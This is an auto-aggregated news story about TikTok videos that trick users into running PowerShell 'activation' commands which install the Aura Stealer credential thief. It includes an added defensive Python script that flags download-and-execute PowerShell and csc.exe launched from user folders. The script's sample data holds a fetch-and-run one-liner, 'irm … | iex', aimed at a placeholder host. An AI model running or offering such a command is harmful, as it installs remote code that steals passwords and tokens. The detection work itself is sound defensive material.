
TikTok Users Lured by Fake Activation Guides Delivering Malware

Summary

  • Cybercriminals disguise malware as free software activation guides on TikTok
  • Malware known as Aura Stealer steals passwords, cookies, crypto wallets, and tokens
  • Scam uses a ClickFix attack to trick users into running malicious PowerShell commands

As of November 16th, 2025, cybercriminals have been actively targeting TikTok users with a new scam involving malicious software disguised as free activation guides. Security experts have confirmed that this campaign, first spotted earlier this year, is still ongoing.

The scammers are creating TikTok videos that show short PowerShell commands and instruct viewers to run them as administrators to "activate" or "fix" popular software like Windows, Microsoft 365, Photoshop, Netflix, and Spotify Premium. However, these commands are designed to connect to a malicious website and download malware known as Aura Stealer.

Once installed, Aura Stealer quietly siphons saved passwords, cookies, cryptocurrency wallets, and authentication tokens from the victim's computer. Additionally, the scam includes another file, source.exe, which uses Microsoft's C# compiler to launch code directly in memory, making it even harder to detect.

Experts warn that this type of "ClickFix" attack is a social engineering trick that makes victims feel they are following legitimate tech instructions. The instructions seem quick and simple, but instead of activating anything, the PowerShell command downloads harmful executables.
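
For defenders, the two behaviours described above (a PowerShell command that fetches from a website and runs the result, and the C# compiler being started by a dropped executable) can be triaged from process-creation logs. The Python below is an added example, not part of the original story or of any vendor's tooling; the event field names, rule names, sample command line, and file paths (including where source.exe sits) are constructed assumptions.

```python
import re

# Download primitives and execution primitives commonly seen together in one-line PowerShell
FETCH = re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|"
                   r"downloadstring|downloadfile|start-bitstransfer)\b", re.I)
EXEC = re.compile(r"\b(iex|invoke-expression|start-process)\b", re.I)
URL = re.compile(r"https?://", re.I)
# Directories a standard user can write to (assumed list, extend for your estate)
USER_WRITABLE = re.compile(r"\\(appdata|temp|downloads)\\", re.I)

def exe_name(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def triage(ev):
    """Return (rule, severity) findings for one process-creation event."""
    findings = []
    image, cmd = exe_name(ev["image"]), ev["cmdline"]
    # Rule 1: PowerShell fetches from a URL and executes in the same command line.
    # Running elevated (the videos ask for administrator) raises the severity.
    if (image in ("powershell.exe", "pwsh.exe") and URL.search(cmd)
            and FETCH.search(cmd) and EXEC.search(cmd)):
        findings.append(("ps_download_and_execute",
                         "high" if ev["elevated"] else "medium"))
    # Rule 2: the C# compiler is started by a binary in a user-writable directory.
    if image == "csc.exe" and USER_WRITABLE.search(ev["parent"]):
        findings.append(("csc_spawned_from_user_path", "high"))
    return findings

# Constructed sample events; every value below is made up for illustration.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CSC = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"
SAMPLE_EVENTS = [
    {"image": PS, "parent": r"C:\Windows\explorer.exe", "elevated": True,
     "cmdline": 'powershell.exe -c "irm https://activate.example.invalid/w | iex"'},
    {"image": CSC, "parent": r"C:\Users\u\AppData\Local\Temp\source.exe",
     "elevated": True,
     "cmdline": r'csc.exe /noconfig @"C:\Users\u\AppData\Local\Temp\x.cmdline"'},
    {"image": PS, "parent": r"C:\Windows\explorer.exe", "elevated": False,
     "cmdline": "powershell.exe Get-ChildItem C:\\Logs"},
    {"image": CSC, "parent": r"C:\Program Files\dotnet\dotnet.exe",
     "elevated": False, "cmdline": "csc.exe /out:app.exe Program.cs"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(exe_name(ev["image"]), triage(ev))
```

Legitimate admin scripts and developer builds can match either rule, so treat the findings as triage leads to review rather than verdicts.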

To avoid becoming a victim, users are advised to never copy or run PowerShell commands from TikTok videos or random websites, and to always download or activate software directly from official sources. Keeping antivirus software up-to-date and using strong passwords are also crucial steps to protect against such scams.

Disclaimer: This story has been auto-aggregated and auto-summarised by a computer program. This story has not been edited or created by the Feedzop team.
The malware used in this scam is known as Aura Stealer, which steals sensitive user data like passwords, cookies, cryptocurrency wallets, and authentication tokens.
The scam uses a "ClickFix" attack, where TikTok videos show short PowerShell commands that claim to activate or fix popular software. When users run these commands, they are actually downloading the Aura Stealer malware.
Experts recommend that users never copy or run PowerShell commands from TikTok videos or random websites, and instead only download software directly from official sources. Keeping antivirus software up-to-date and using strong, unique passwords are also crucial steps to stay safe.
